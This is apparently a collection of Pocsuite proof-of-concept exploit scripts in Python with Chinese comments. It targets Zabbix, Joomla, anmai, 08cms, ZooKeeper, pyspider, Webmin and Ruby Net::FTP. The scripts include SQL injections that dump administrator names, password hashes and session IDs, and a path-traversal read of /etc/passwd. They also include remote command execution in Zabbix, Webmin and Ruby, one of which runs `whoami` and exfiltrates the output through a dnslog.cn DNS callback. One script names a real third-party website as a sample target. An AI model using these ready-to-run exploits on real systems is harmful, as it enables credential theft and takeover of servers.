from pocsuite.api.request import req 
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase

import urlparse
import urllib2
import re

class ZabbixPOC(POCBase):
    vulID = '9'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1' #默认为1
    vulDate = '2017-03-22' #漏洞公开的时间,不知道就写今天

    author = 'ly55521' #  PoC作者的大名
    createDate = '2017-03-22'# 编写 PoC 的日期
    updateDate = '2017-03-22'# PoC 更新的时间,默认和编写时间一样
    references = 'https://www.waitalone.cn/zabbix-sql-1.html'# 漏洞地址来源,0day不用写
    name = 'Zabbix SQL Injection'# PoC 名称
    appPowerLink = 'http://www.zabbix.com'# 漏洞厂商主页地址
    appName = 'Zabbix'# 漏洞应用名称
    appVersion = '2.2.x, 3.0.0-3.0.3'# 漏洞影响版本
    vulType = 'sql-inj'#漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        Zabbix SQL注入漏洞
    ''' # 漏洞简要描述
    samples = []# 测试样列,就是用 PoC 测试成功的网站
    install_requires = [] # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"高危" #严重,高危,中危,低危
    vul_url = ''


    #验证漏洞 pocsuite -r 9-zabbix-sqlInjection.py -u 10.1.5.26 --verify
    def _verify(self):
        #定义返回结果  
        result = {}
        #获取漏洞url
        Payload = "/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=999'&updateProfile=true&screenitemid=.=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1"
        host = urlparse.urlparse(self.url).scheme + "://" + urlparse.urlparse(self.url).netloc
        self.vul_url = str( host + Payload)
        #print self.vul_url
        try:
            r = req.get(url=self.vul_url,allow_redirects=False,timeout=10).status_code #禁止重定向
            key_reg = re.compile(r"INSERT\s*INTO\s*profiles")
            #print r,key_reg
            if  key_reg.findall(r):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.vul_url
                result['VerifyInfo']['Payload'] = Payload
            else:
                pass
        except Exception as e:
            pass
        print('[+]9 poc done')
        return self.save_output(result)

    #攻击漏洞 pocsuite -r 9-zabbix-sqlInjection.py -u 10.1.5.26 --attack
    def _attack(self):
        result = {}
        # 攻击代码
        passwd_sql = "(select 1 from(select count(*),concat((select (select (select concat(0x7e,(select concat(name,0x3a,passwd) from  users limit 0,1),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
        session_sql = "(select 1 from(select count(*),concat((select (select (select concat(0x7e,(select sessionid from sessions limit 0,1),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
        pwd = u"passwd:" + self.sql_Inject(passwd_sql)
        session = u"--session:" + self.sql_Inject(session_sql)
        Payload = pwd + session
        #print self.vul_url,Payload
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = self.vul_url
        result['VerifyInfo']['Payload'] = Payload
        return self.save_output(result)

    #SQL注入攻击函数
    def sql_Inject(self,sql):
        #u'获取特定sql语句内容'
        payload = self.vul_url + "/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=" + urllib2.quote(
            sql) + "&updateProfile=true&screenitemid=.=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1"
        #print payload
        try:
            response = urllib2.urlopen(payload, timeout=10).read()
        except Exception as msg:
            #print msg
            pass
        else:
            result_reg = re.compile(r"Duplicate\s*entry\s*'~(.+?)~1")
            results = result_reg.findall(response)
            if results:
                return str(results[0])

    def save_output(self, result):
        #判断有无结果并输出
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output

register(ZabbixPOC)




#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import re

class TestPOC(POCBase):
    vulID = '70258'  # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2011-03-23'
    createDate = '2016-02-13'
    updateDate = '2016-02-13'
    references = ['http://www.seebug.org/vuldb/ssvid-70258']
    name = 'Joomla Component (com_jimtawl) Local File Inclusion Vulnerability'
    appPowerLink = 'http://www.joomla.org'
    appName = 'Joomla Component (com_jimtawl)'
    appVersion = '1.0.2'
    vulType = 'Local File Inclusion'
    desc = '''
        Joomla!的 Jimtawl（com_jimtawl）组件1.0.2版本中存在目录遍历漏洞。
        远程攻击者可以借助向index.php传递的task参数中的“..”操作符，
        读取任意文件或者可能引起其他未明影响。

        该漏洞利用成功需要具备两个条件：
        (1)magic_quotes_gpc=off
        (2)PHP小于5.3.4

        该漏洞读取/etc/passwd的POC如下：
        http://***/index.php?option=com_jimtawl&Itemid=12&task=
        ../../../../../../../../../../../../../../../etc/passwd%00

        验证效果图如下所示：
        http://pan.baidu.com/s/1jHhgSKm
    '''
    samples = ['http://www.atbc.net.au']

    def _attack(self):
        return self._verify()

    def _verify(self):
        #尝试利用LFI来读取/etc/passwd的内容
        result = {}
        #读取的文件名
        filename='/etc/passwd'
        #漏洞路径
        exploit='/index.php?option=com_jimtawl&Itemid=12&task='
        #截断符号
        dBs='%00'
        #..的个数
        dots='../../../../../../../../../../../../../../..'
        #漏洞利用地址
        vulurl=self.url+exploit+dots+filename+dBs
        #伪造的HTTP头
        httphead = {
          'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
          'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
          'Connection':'keep-alive'
        }
        #发送请求，并返回结果
        resp=req.get(vulurl,headers=httphead,timeout=50)
        #根据状态码和返回文件的内容，判断是否利用成功
        if resp.status_code==200 and re.match('root:.+?:0:0:.+?:.+?:.+?', resp.content):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vulurl
            #记录文件内容
            result['Fileinfo']={}
            result['Fileinfo']['Filename']=filename
            result['Fileinfo']['Content']=resp.content[0:32]+'...'
        return self.parse_output(result)

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)


#!/usr/bin/env python
#_*_ encoding: utf-8 _*_
from pocsuite3.api import register_poc
from pocsuite3.api import requests
from pocsuite3.api import Output
from pocsuite3.api import logger
from pocsuite3.api import POCBase
from collections import OrderedDict
from pocsuite3.api import OptString
import json
from pocsuite3.lib.utils import random_str

class Zabbix(POCBase):
    vulID = 'N/A'
    version = '1.0'
    author = 'big04dream'
    vulDate = ''
    createDate = '2019-11-06'
    updateDate = '2019-11-06'
    references = ['']
    name = 'Zabbix 2.2 < 3.0.3 - API JSON-RPC Remote Code Execution'
    appPowerLink = ''
    appName = 'Zabbix'
    appVersion = 'Zabbix 2.2 < 3.0.3'
    vulType = 'rce'
    desc = ''' 
    Zabbix 2.2 < 3.0.3 - API JSON-RPC Remote Code Execution
    '''

    def _options(self):
        o = OrderedDict()
        o['username'] = OptString('', description='username', require=False)
        o['password'] = OptString('', description='password', require=False)
        o['hostid'] = OptString('', description='hostid', require=False)
        return o

    def _headers(self):
        headers = {
            'content-type': 'application/json',
        }
        return headers

    def _verify(self):
        result = {}
        cmd = random_str(16) + '.6eb4yw.ceye.io'
        try:
            if self.url[-1] == '/':
                url = self.url + 'api_jsonrpc.php'
            else:
                url = self.url + '/api_jsonrpc.php'
            username = self.get_option('username') or 'Admin'
            password = self.get_option('password') or 'zabbix'
            hostid = self.get_option('hostid') or '10084'
            authData = {
                "jsonrpc" : "2.0",
                "method" : "user.login",
                "params": {
                    'user': "" + username + "",
                    'password': "" + password + "",
                },
                "auth" : None,
                "id" : 0,
            }
            response = requests.post(
                url=url,
                data=json.dumps(authData),
                headers=self._headers()
            )
            auth = response.json()
            payload = {
                "jsonrpc": "2.0",
                "method": "script.update",
                "params": {
                    "scriptid": "1",
                    "command": "" + 'ping ' + cmd + ""
                },
                "auth" : auth['result'],
                "id" : 0,
            }
            requests.post(
                url=url,
                data=json.dumps(payload),
                headers=self._headers()
            )
            ec = {
                "jsonrpc": "2.0",
                "method": "script.execute",
                "params": {
                    "scriptid": "1",
                    "hostid": ""+hostid+""
                },
                "auth" : auth['result'],
                "id" : 0,
            }
            requests.post(
                url=url,
                data=json.dumps(ec),
                headers=self._headers()
            )
            res = requests.get('http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns')
            if cmd in res:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['Payload'] = payload
        except:
            pass
        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Not vulnerability')
        return output

register_poc(Zabbix)


#!/usr/bin/python
# -*- coding:utf-8 -*-

import string
import random
import time
import re
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    name = 'anmai POST sql injection'
    vulID = '0'
    author = ['LRestless']
    vulType = 'sql-inj'
    version = '1'
    references = ['https://shuimugan.com/bug/view?bug_no=108502']
    desc = '''anmai POST注入'''

    vulDate = '2015-04-13'
    createDate = '2019-04-11'
    updateDate = '2019-04-11'

    appName = 'anmai'
    appVersion = '正式版'
    appPowerLink = 'http://www.anmai.net/'
    samples = ['re']

    def _attack(self):
        """attack mode"""
        result = {}
        s = req.Session()
        s.post(self.url)
        self.url = self.url.strip('/') + "/time/shezhiSystem/XueKeNocourse.aspx"
        data = {
            'course': "' and (char(126)+DB_NAME()+char(126))>0--"
        }
        resp = s.post(self.url, data=data)
        dbname = re.search('~(.*?)~', resp.content)
        if dbname:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['Database'] = {}
            result['Database']['DBname'] = dbname.group(1)
        return self.parse_output(result)

    def _verify(self):
        """verify  mode"""
        result = {}
        s = req.Session()
        s.get(self.url)
        self.url = self.url.strip('/') + "/time/shezhiSystem/XueKeNocourse.aspx"
        data = {
            'course':"1' and (CHAR(115)+CHAR(104)+CHAR(117)+CHAR(90)+CHAR(73)+CHAR(103)+CHAR(117)+CHAR(97)+CHAR(110)+CHAR(88)+CHAR(73)+CHAR(78)+CHAR(71))>0--"
        }
        resp = s.post(self.url, data=data)
        if 'shuZIguanXING' in resp.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)




#!/usr/bin/env python
# coding: utf-8
import socket
from urllib.parse import urlparse
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE


class TestPOC(POCBase):
    vulID = '0'
    version = '1.0'
    author = 'hancool'
    vulDate = '2018-12-25'
    createDate = '2018-12-25'
    updateDate = '2018-12-25'
    references = ['', ]
    name = 'Apache ZooKeeper unauthorized access'
    appPowerLink = ''
    appName = 'zookeeper'
    appVersion = 'All'
    vulType = VUL_TYPE.UNAUTHORIZED_ACCESS
    category = POC_CATEGORY.EXPLOITS.REMOTE
    desc = '''
    Apache Zookeeper安装部署之后默认情况下不需要身份认证，攻击者可通过该漏洞泄露服务器的敏感信息。
    '''

    def _verify(self):
        result = {}
        pr = urlparse(self.url)
        if pr.port:  # and pr.port not in ports:
            ports = [pr.port]
        else:
            ports = [2181, 12181, 22181]
        for port in ports:
            try:
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect((pr.hostname, port))
                s.send(b'envi')
                info = s.recv(4096)
                if b'zookeeper.version' in info:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = '{}:{}'.format(
                        pr.hostname, port)
                    result['extra'] = {}
                    result['extra']['evidence'] = info.decode('utf-8').strip()
                    break
            except:
                # raise
                pass
            finally:
                s.close()

        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not vulnerability')
        return output


register_poc(TestPOC)



#!/usr/bin/python
# -*- coding:utf-8 -*-

import string
import random
import time
import re
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    name = '08cms search SQL Injection'
    vulID = '0'
    author = ['LRestless']
    vulType = 'sql-inj'
    version = '1'
    references = ['http://www.hackdig.com/?10/hack-6295.htm']
    desc = '''08cms_v5.0  search.php的orderby存在注入'''

    vulDate = '2013-10-09'
    createDate = '2019-03-22'
    updateDate = '2019-03-22'

    appName = '08cms'
    appVersion = '5.0'
    appPowerLink = 'http://www.08cms.com/product'
    samples = ['re']

    def _attack(self):
        """attack mode"""
        return self._verify()

    def _verify(self):
        """verify  mode"""
        result = {}
        s = req.Session()
        s.get(self.url)
        self.url = self.url.strip('/') + '/search.php?chid=1&carsfullname=aa&searchmode=subject&orderby=aid'
        payload1 = '%20and%20(select%201%20from%20(select%20count(*),concat('
        paylaod2 = ',floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)&addno=0&ccid8=366'
        flag = "".join(random.choice(string.ascii_letters) for _ in xrange(0,8))
        flag = flag.lower()
        geturl = self.url + payload1 + flag + paylaod2
        resp = s.get(geturl)
        con = re.search(flag, resp.text)
        time.sleep(2)
        if con:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)




#!/usr/bin/python
# -*- coding: utf-8 -*-
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
from pocsuite.api.request import req
import IPy,re
def check_accurate(ip,port):
    '''
    accurate check
    check if python script can be executed
    '''
    url="http://"+ip+":"+str(port)+"/debug/pyspidervulntest/run"
    headers={"Content-Type": "application/x-www-form-urlencoded"}
    data='''
    webdav_mode=false&script=from+pyspider.libs.base_handler+import+*%0Aclass+Handler(BaseHandler)%3A%0A++++def+on_start(self)%3A%0A++++++++print('pyspidervulnerable')&task=%7B%0A++%22process%22%3A+%7B%0A++++%22callback%22%3A+%22on_start%22%0A++%7D%2C%0A++%22project%22%3A+%22pyspidervulntest%22%2C%0A++%22taskid%22%3A+%22data%3A%2Con_start%22%2C%0A++%22url%22%3A+%22data%3A%2Con_start%22%0A%7D
    '''
    try:
        r=req.post(url=url,data=data,headers=headers,timeout=1)
        if  '"logs": "pyspidervulnerable\\n"' in r.text:
            return True
    except Exception:
        return False
    return False
def poc(url):
    ip = re.findall(r"\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b", url)
    ip = str(IPy.IP(ip[0]))
    if check_accurate(ip, "5000"):
        return True
    else:
        return False

class TestPOC(POCBase):
    name = 'pyspider未授权访问漏洞'
    vulID = '无'
    author = ['sxd']
    vulType = 'Unauthorized access'
    version = '1.0'  # default version: 1.0
    references = ['http://www.0-sec.org/0day/Pyspider/1.html']
    desc = '''
		  pyspider未授权访问
		   '''
    vulDate = '2020-03-31'
    createDate = '2020-03-31'
    updateDate = '2020-03-31'
    appName = 'pyspider'
    appVersion = 'all'
    appPowerLink = ''
    samples = ['IPy',"re"]

    def _attack(self):
        '''attack mode'''
        return self._verify()

    def _verify(self):
        '''verify mode'''
        result = {}
        response = poc(self.url)
        if response:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url + ' pyspider未授权访问漏洞' + ' is exist!'
        return self.parse_output(result)
    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output
register(TestPOC)



#!/usr/bin/env python
# coding: utf-8
from urllib.parse import urlparse
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE

req.packages.urllib3.disable_warnings()


class TestPOC(POCBase):
    vulID = ''
    version = '1.0'
    author = 'jerome'
    vulDate = '2019-8-12'
    createDate = '2020-2-14'
    updateDate = '2020-2-14'
    references = ['https://www.exploit-db.com/exploits/47230']
    name = 'CVE-2019-15107 - Webmin 1.920 - Unauthenticated Remote Code Execution'
    appPowerLink = 'https://docs.microsoft.com/en-us/security-updates/securitybulletins/2015/ms15-034'
    appName = 'webmin'
    appVersion = '1.92'
    vulType = VUL_TYPE.CODE_EXECUTION
    category = POC_CATEGORY.EXPLOITS.REMOTE
    desc = '''
        This module exploits a backdoor in Webmin versions 1.890 through 1.920.
        Only the SourceForge downloads were backdoored, but they are listed as
        official downloads on the project's site.

        Unknown attacker(s) inserted Perl qx statements into the build server's
        source code on two separate occasions: once in April 2018, introducing
        the backdoor in the 1.890 release, and in July 2018, reintroducing the
        backdoor in releases 1.900 through 1.920.

        Only version 1.890 is exploitable in the default install. Later affected
        versions require the expired password changing feature to be enabled.
    '''

    def _verify(self):
        result = {}
        pr = urlparse(self.url)
        if pr.port:
            ports = [pr.port]
        else:
            ports = [10000]
        for scheme in ('https','http'):
            for port in ports:
                target = '{}://{}:{}/password_change.cgi'.format(
                    scheme, pr.hostname, port)
                # 定义请求头
                post_cookies = {"redirect": "1", "testing": "1",
                                "sid": "x", "sessiontest": "1"}
                post_headers = {"Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Accept-Language": "en",
                                "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", "Connection": "close", "Referer": target, "Content-Type": "application/x-www-form-urlencoded"}
                # 发送带指令的请求数据
                post_data = {"user": "rootxx", "pam": '', "expired": "2",
                            "old": "test|echo 0xdeadbeaf", "new1": "test2", "new2": "test2"}
                response = req.post(target, headers=post_headers,
                                    cookies=post_cookies, data=post_data, verify=False)
                # 根据回显判断目标是否存在漏洞
                if response and response.status_code == 200 and "0xdeadbeaf" in response.text:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = '{}://{}:{}'.format(
                        scheme,pr.hostname, port)
                    break
        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not vulnerability')
        return output


register_poc(TestPOC)



#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
import re

class TestPOC(POCBase):
    vulID = '0'
    version = '0'
    author = 'jeffzhang'
    vulDate = '2017-08-26'
    createDate = '2017-08-26'
    updateDate = '2017-08-26'
    references = ['http://www.freebuf.com/vuls/112197.html']
    name = 'Zabbix SQl 注入漏洞(获取账户密码)'
    appPowerLink = 'https://www.zabbix.com'
    appName = 'Zabbix'
    appVersion = '3.0.3'
    vulType = 'SQL Injection'
    desc = '''
    	Zabbix 2.2.x和3.0.x版本中存在两处基于错误回显的SQL注入漏洞
    '''
    samples = ['']

    def _verify(self):
        try:
            result = {}
            headers={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0'}
            payload = "/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=999 or updatexml(1,concat(0x7e,(select substr(concat(surname),1,31) from users limit 0,1)),0)&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1"
            att_url = self.url + payload
            response = req.get(att_url,headers=headers,timeout=10)

            #获取用户名
            info_name = re.search(r'\[XPATH syntax error: \'~(.*?)\'\]',response.content)

            #获取密码
            payload = "/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=999 or updatexml(1,concat(0x7e,(select substr(concat(passwd),1,31) from users limit 0,1)),0)&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1"
            att_url = self.url + payload
            response = req.get(att_url,timeout=10)
            info_pwd = re.search(r'\[XPATH syntax error: \'~(.*?)\'\]',response.content)

            payload = "/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=999 or updatexml(1,concat(0x7e,(select substr(concat(passwd),32,32) from users limit 0,1)),0)&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1"
            att_url = self.url + payload
            response = req.get(att_url,timeout=10)
            info_pwd_end = re.search(r'\[XPATH syntax error: \'~(.*?)\'\]',response.content)

            if info_name and info_pwd and info_pwd_end:
                username = info_name.group(1)
                password = info_pwd.group(1) + info_pwd_end.group(1)
                result['DBInfo'] = {}
                result['DBInfo']['Username'] = username
                result['DBInfo']['Password'] = password
        except Exception:
            pass
        return self.parse_attack(result)

    def _attack(self):
        return self._verify()

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet noting return')
        return output


register(TestPOC)



#!/usr/bin/python
# -*- coding: utf-8 -*-
import re
# from pocsuite.api.request import req #用法和 requests 完全相同
# from pocsuite.api.poc import register
# from pocsuite.api.poc import Output, POCBase
import requests as req
from pocsuite3.api import POCBase, Output, register_poc as register

headers1 = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3970.5 Safari/537.36',
    'Host': 'www.dnslog.cn',
    'Cookie': 'UM_distinctid=1703200149e449-053d4e8089c385-741a3944-1fa400-1703200149f80a; PHPSESSID=jfhfaj7op8u8i5sif6d4ai30j4; CNZZDATA1278305074=1095383570-1581386830-null%7C1581390548',
    'Accept': '*/*',
    'Referer': 'http://www.dnslog.cn/',
    'Accept-Language': 'zh-CN,zh;q=0.9',
    'Connection': 'close'}


def get_dns():
    url1 = "http://www.dnslog.cn/getdomain.php?t=0.08025501698741366"
    dns_url = req.get(url1, verify=False, timeout=5, headers=headers1).text
    return dns_url


def show_dns():
    url2 = "http://www.dnslog.cn/getrecords.php?t=0.913020034617231"
    dns_text = req.get(url2, verify=False, timeout=5, headers=headers1).text
    return dns_text


def poc(url):
    ip = re.findall(r"\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b", url)
    if not url.startswith("http"):
        url = "http://" + url
    try:
        dns = get_dns()
        payload = url + "/download?uri=ftp://" + ip[0] + ":2121/&file=|ping${IFS}`whoami`." + dns + "${IFS}-c${IFS}4"
        res = req.get(payload, verify=False, timeout=5)
    except Exception:
        res = ""
    return res


class TestPOC(POCBase):
    name = 'ruby_ftp_RCE_CVE-2017-17405'
    vulID = 'CVE-2017-17405'  # https://www.seebug.org/vuldb/ssvid-96996
    author = ['sxd']
    vulType = 'RCE'  # 远程代码执行漏洞
    version = '1.0'  # default version: 1.0
    references = ['']
    desc = '''
		   Ruby Net::FTP 模块是一个FTP客户端，在上传和下载文件的过程中，打开本地文件时使用了`open`函数。
		   而在ruby中，`open`函数是借用系统命令来打开文件，且没用过滤shell字符，导致在用户控制文件名的情况下，将可以注入任意命令。
		   '''
    vulDate = '2020-03-25'
    createDate = '2020-03-25'
    updateDate = '2020-03-25'
    appName = 'ruby'
    appVersion = '2.2.8、2.3.5、2.4.2、2.5.0'
    appPowerLink = ''  # 漏洞厂商主页地址
    samples = ['']  # 测试用例
    install_requires = ["re"]

    def _attack(self):
        '''attack mode'''
        return self._verify()

    def _verify(self):
        '''verify mode'''
        result = {}
        response = poc(self.url)
        shwo_dns_text = show_dns()
        if ".dnslog.cn" in shwo_dns_text:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url + 'ruby_ftp_RCE_CVE-2017-17405' + ' is exist!'
            result['AdminInfo'] = {}
            result['AdminInfo']['Username'] = re.compile("\w+.\w*.dnslog").findall(shwo_dns_text)[0].split(".")[0]
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)
